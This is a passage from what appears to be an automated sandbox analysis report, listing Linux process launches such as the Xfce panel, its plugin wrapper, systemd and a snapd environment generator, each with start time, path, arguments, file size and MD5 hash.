                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/bin/xfce4-panel
                          Arguments:-
                          File size:375768 bytes
                          MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                          Start time (UTC):05:57:58
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                          Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                          File size:35136 bytes
                          MD5 hash:ac0b8a906f359a8ae102244738682e76

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/systemd/systemd
                          Arguments:-
                          File size:1620224 bytes
                          MD5 hash:9b2bec7092a40488108543f9334aab75

                          Start time (UTC):05:58:02
                          Start date (UTC):13/01/2025
                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                          File size:22760 bytes
                          MD5 hash:3633b075f40283ec938a2a6a89671b0e